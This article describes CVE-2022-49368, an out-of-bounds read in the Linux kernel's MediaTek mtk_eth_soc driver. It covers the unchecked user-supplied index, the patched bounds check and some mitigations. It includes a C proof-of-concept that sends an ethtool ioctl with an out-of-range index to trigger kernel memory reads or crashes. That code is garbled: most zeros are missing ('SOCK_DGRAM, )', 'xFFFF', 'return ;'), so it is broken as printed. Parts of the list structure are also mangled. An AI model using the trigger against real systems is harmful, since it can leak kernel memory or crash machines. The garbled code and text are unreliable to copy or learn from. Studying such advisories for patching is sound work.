CVE-2022-49368 - Out-of-Bounds Read Vulnerability in Linux Kernel’s mtk_eth_soc Driver

In late 2022, a vulnerability was identified and patched in the Linux kernel’s MediaTek Ethernet driver (mtk_eth_soc). This flaw—now tracked as CVE-2022-49368—could allow local attackers to trigger an out-of-bounds read, potentially leading to information leaks or kernel crashes.

This article breaks down the issue, shows you where the bug lives in the code, and explains how the patch closes the hole. If you’re running Linux on MediaTek chips, especially with custom hardware or open router projects, you’ll want to read this closely.

Vulnerability Details

- Component: Linux kernel – net/ethernet/mediatek/mtk_eth_soc.c

Bug Class: Out-of-bounds read

- CVE ID: CVE-2022-49368
- Source: Linux Kernel Patch (kernel.org)

What’s the Issue?

The function mtk_hwlro_get_fdir_entry() is responsible for reading flow director (FDIR) table entries when userspace tools like ethtool request offload/flow characteristics. The exploit exists because the function pulls an index—fsp->location—directly from userspace with no bounds checking before using it.

Without proper checks, a malicious local user could supply a bogus value. When the function tries to access the FDIR table at this out-of-range index, the kernel could end up reading or leaking memory that it shouldn’t.

The kernel passes user data to mtk_hwlro_get_fdir_entry(), using whatever index the user gives.

3. If the index is too large, the function reads out of the fdir table bounds: potential for info leak or crash.

Let’s look at the problematic code (simplified for clarity)

static int mtk_hwlro_get_fdir_entry(struct mtk_eth *eth, struct ethtool_rxnfc *cmd)
{
    ...
    struct ethtool_rx_flow_spec *fsp =
        (struct ethtool_rx_flow_spec *)&cmd->fs;
    int index = fsp->location;
    // No checks on index!
    struct mtk_flow_entry *entry = eth->hwlro_fdir_entries[index];
    ...
}

The exploit here: index is controlled by the user, and there’s no check that it’s within the range of allocated entries!

Information disclosure (read some kernel memory)

- Potential kernel crash/PANIC if bad pointer dereferenced

Affected: Most Linux versions with the mtk_eth_soc driver before the patch

This bug is mainly relevant if your device exposes the mtk_eth_soc driver to multiple users. For example, routers with custom firmware, or embedded Linux systems with multiple local user accounts.

Exploitation in Practice

While there’s currently no public proof-of-concept exploiting this specific bug, a malicious user could use existing command-line tools (ethtool) to trigger the bug. Here’s a rough sketch in C for educational purposes:

#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <linux/ethtool.h>
#include <linux/sockios.h>
#include <net/if.h>

int main() {
    int sock = socket(AF_INET, SOCK_DGRAM, );
    struct ethtool_rxnfc rxnfc;
    struct ifreq ifr;

    memset(&rxnfc, , sizeof(rxnfc));
    rxnfc.cmd = ETHTOOL_GRXCLSRULE;
    // Set fsp.location to a HUGE value to trigger out of bounds
    rxnfc.fs.location = xFFFF;

    strncpy(ifr.ifr_name, "eth", IFNAMSIZ);
    ifr.ifr_data = (char *)&rxnfc;

    if (ioctl(sock, SIOCETHTOOL, &ifr) == -1) {
        perror("ioctl");
    } else {
        printf("Command completed\n");
    }
    return ;
}

This code tries to fetch a receive classifier rule from the kernel, specifying an absurd index (xFFFF). On a vulnerable kernel, this could cause the OOB read.

The Fix

The patch is straightforward: add bounds checking for the incoming index before using it.

Patched code snippet

if (fsp->location >= MTK_MAX_FDIR_ENTRIES) {
    return -EINVAL;
}

This simple check guarantees that the kernel never tries to access an entry outside its allocated table. If the user gives a bad index, the function just returns an error, keeping kernel memory safe.

See the original commit:
net: ethernet: mtk_eth_soc: out of bounds read in mtk_hwlro_get_fdir_entry()

Upgrade: Make sure your Linux kernel is up-to-date if you use MediaTek SoC ethernet hardware.

- Restrict access: Prevent untrusted users from accessing ethtool or network configuration tools.

Audit custom builds: If your device uses a forked Linux kernel, backport this fix.

While this isn't remotely exploitable, it’s a reminder of the risks from even “mundane” userspace interfaces talking to kernel code.

References

- CVE-2022-49368 at NVD
- Linux Kernel Patch
- Discussion on lore.kernel.org

Timeline

Published on: 02/26/2025 07:01:13 UTC
Last modified on: 04/14/2025 20:42:24 UTC